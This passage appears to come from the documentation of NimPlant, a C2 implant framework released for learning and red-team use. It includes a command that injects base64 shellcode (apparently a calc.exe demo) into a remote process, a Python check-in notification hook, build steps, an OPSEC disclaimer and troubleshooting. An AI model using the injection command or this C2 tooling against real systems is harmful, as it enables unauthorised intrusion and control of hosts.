    inline-execute /linux/path/to/createremotethread.x64.o go 1337 i /EiD5PDowAAAAEFRQVBSUVZIMdJlSItSYEiLUhhIi1IgSItyUEgPt0pKTTHJSDHArDxhfAIsIEHByQ1BAcHi7VJBUUiLUiCLQjxIAdCLgIgAAABIhcB0Z0gB0FCLSBhEi0AgSQHQ41ZI/8lBizSISAHWTTHJSDHArEHByQ1BAcE44HXxTANMJAhFOdF12FhEi0AkSQHQZkGLDEhEi0AcSQHQQYsEiEgB0EFYQVheWVpBWEFZQVpIg+wgQVL/4FhBWVpIixLpV////11IugEAAAAAAAAASI2NAQEAAEG6MYtvh//Vu+AdKgpBuqaVvZ3/1UiDxCg8BnwKgPvgdQW7 RxNyb2oAWUGJ2v/VY2FsYy5leGUA b

    # Depending on the BOF, sometimes argument parsing is a bit different using NiCOFF
    # Make sure arguments are passed as expected by the BOF (can usually be retrieved from .CNA or BOF source)
    # An example:
    inline-execute enum_filter_driver.x64.o go # CRASHES - default null handling does not work
    inline-execute enum_filter_driver.x64.o go "" z # OK - arguments are passed as expected

    Push Notifications

    By default, NimPlant supports push notifications via the notify_user() hook defined in server/util/notify.py. Out of the box, it implements a simple Telegram notification, which requires the TELEGRAM_CHAT_ID and TELEGRAM_BOT_TOKEN environment variables to be set before it will fire. Of course, the code can easily be extended with your own push notification functionality. The notify_user() hook is called when a new NimPlant checks in and receives an object with the NimPlant's details, which can then be pushed as desired.
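
    For instance, a replacement hook could look roughly like the sketch below (the attribute names on the NimPlant object and the SLACK_WEBHOOK_URL variable are assumptions for illustration, not the shipped implementation):

    # server/util/notify.py (illustrative sketch, not the shipped Telegram code)
    import os
    import requests

    def notify_user(np):
        # Called by the NimPlant server when a new implant checks in.
        # 'np' carries the NimPlant details; the attributes used here are assumed.
        hostname = getattr(np, "hostname", "unknown host")
        username = getattr(np, "username", "unknown user")
        message = f"New NimPlant check-in: {username}@{hostname}"

        webhook = os.environ.get("SLACK_WEBHOOK_URL")  # hypothetical custom integration
        if webhook:
            requests.post(webhook, json={"text": message}, timeout=10)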

    Building the frontend

    As a normal user, you shouldn't have to modify or re-build the UI that comes with Nimplant. However, if you want to make changes, install NodeJS and run npm install while in the ui directory. Then run ui/build-ui.py. This will take care of pulling the packages, compiling the Next.JS frontend, and placing the files in the right location for the Nimplant server to use them.

    A word on production use and OPSEC

    NimPlant was developed as a learning project and released to the public for transparency and educational purposes. For a large part, it makes no effort to hide its intentions. Additionally, protections have been put in place to prevent abuse. In other words, do NOT use NimPlant in production engagements as-is without thorough source code review and modifications! Also remember that, as with any C2 framework, the OPSEC fingerprint of running certain commands should be considered before deployment. NimPlant can be compiled without OPSEC-risky commands by setting riskyMode to false in config.toml.

    Troubleshooting

    There are many reasons why Nimplant may fail to compile or run. If you encounter issues, please try the following (in order):

    • Ensure you followed the steps as described in the 'Installation' section above, double check that all dependencies are installed and the versions match
    • Ensure you followed the steps as described in the 'Compilation' section above, and that you have used the chvancooten/nimbuild docker container to rule out any dependency issues
    • Check the logs in the server/logs directory for any errors
    • Try the nim-debug compilation mode to compile with console and debug messages (.exe only) to see if any error messages are returned
    • Try compiling from another OS or with another toolchain to see if the same error occurs
    • If all of the above fails, submit an issue. Make sure to include the appropriate build information (OS, nim/python versions, dependency versions) and the outcome of the troubleshooting steps above. Incomplete issues may be closed without notice.

